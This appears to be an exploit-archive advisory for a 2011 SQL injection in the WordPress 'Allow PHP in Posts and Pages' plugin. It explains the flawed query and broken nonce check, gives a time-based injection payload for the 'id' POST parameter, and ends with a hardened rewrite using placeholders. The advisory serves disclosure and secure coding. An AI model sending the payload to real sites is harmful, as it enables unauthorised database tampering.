WordPress Allow PHP in Posts and Pages plugin - exploit.company
Vendor: Allow PHP in Posts and Pages plugin
By: Miroslav Stampar
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: Allow PHP in Posts and Pages plugin
Affected Version From: <= 2.0.0.RC1
Patch Exists: YES
Platforms Tested: WordPress
Year: 2011

WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability

The plugin's 'alter.php' builds an UPDATE statement by concatenating the POST parameters 'id', 'function' and 'name' directly into the query string, and the $wpdb->prepare() call receives that finished string with no placeholders, so none of the values is escaped. An attacker who can send a POST request to 'alter.php' can therefore inject SQL through these parameters (the PoC below uses 'id') and modify or delete data in the database.

Mitigation:

Update to a patched version of the plugin, or disable it if it is not needed. In the plugin code itself, user input must be bound through $wpdb->prepare() placeholders (%s, %d) rather than concatenated into the query string.

Exploit-DB raw data:

# Exploit Title: WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/allow-php-in-posts-and-pages.zip
# Version: 2.0.0.RC1 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/allow-php-in-posts-and-pages/alter.php
 allowPHPNonce=-1&action=modify&function=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
    if(!isset($_POST['allowPHPNonce'])){
        // The nonce is only verified when it is absent from the request; any request that
        // supplies an 'allowPHPNonce' value (as the PoC does) skips verification entirely.
        if ( !wp_verify_nonce( $_POST['allowPHPNonce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
    }
    else{
        // header() is not followed by exit, so execution continues after the redirect is sent
        if(!isset($_POST['action']) || !defined ('ABSPATH')){header("location:".$refer);}
        // id, function and name are taken from POST verbatim: no escaping, no integer cast
        if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
        if(isset($_POST['function'])){$function = $_POST['function'];}else{$function="";}
        if(isset($_POST['name'])){$name = $_POST['name'];}else{$name="";}
        $action = $_POST['action'];

        #delete
        if($action == "delete"){

        ...

        elseif($action == "modify" && $function != ""){
            // All three values are concatenated straight into the UPDATE statement ...
            $sql = "update ".$wpdb->prefix."allowPHP_functions set function='".$function."', name='".$name."' where id = ".$id;
            // ... and prepare() is handed the finished string with no placeholder arguments,
            // so it performs no escaping before the query is executed.
            $results = $wpdb->get_results($wpdb->prepare($sql));
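A hardened rewrite of the "modify" branch above, added here as an example and not the plugin's own patch. It assumes it runs inside WordPress (global $wpdb, wp_verify_nonce(), wp_safe_redirect(), current_user_can()) and that $refer holds the redirect target as in the original snippet; the 'manage_options' capability is an assumed choice.

```php
<?php
// Added example: hardened "modify" handler for alter.php (not the plugin's own fix).
// Assumes WordPress is loaded ($wpdb, wp_verify_nonce, wp_safe_redirect, current_user_can)
// and that $refer is the redirect target from the original snippet.

global $wpdb;

// 1. Verify the nonce on every request (the original only checked it when it was missing)
//    and stop execution after the redirect instead of falling through.
if ( ! isset( $_POST['allowPHPNonce'] )
     || ! wp_verify_nonce( $_POST['allowPHPNonce'], plugin_basename( __FILE__ ) ) ) {
    wp_safe_redirect( $refer );
    exit;
}

// 2. A nonce proves intent, not authority: require a capability as well (assumed choice).
if ( ! current_user_can( 'manage_options' ) ) {
    wp_safe_redirect( $refer );
    exit;
}

$action   = isset( $_POST['action'] )   ? sanitize_key( $_POST['action'] ) : '';
$id       = isset( $_POST['id'] )       ? absint( $_POST['id'] ) : 0;   // integer only
// 'function' holds PHP source by design, so it is left unsanitized but is bound below,
// never concatenated.
$function = isset( $_POST['function'] ) ? wp_unslash( $_POST['function'] ) : '';
$name     = isset( $_POST['name'] )     ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';

if ( $action === 'modify' && $function !== '' && $id > 0 ) {
    // 3. Values go to prepare() as arguments for %s / %d placeholders. The original built
    //    the complete statement first and called prepare($sql) with no arguments, so the
    //    values were never escaped.
    $sql = $wpdb->prepare(
        "UPDATE {$wpdb->prefix}allowPHP_functions SET `function` = %s, `name` = %s WHERE id = %d",
        $function,
        $name,
        $id
    );
    $affected = $wpdb->query( $sql ); // rows affected, or false on error
}
```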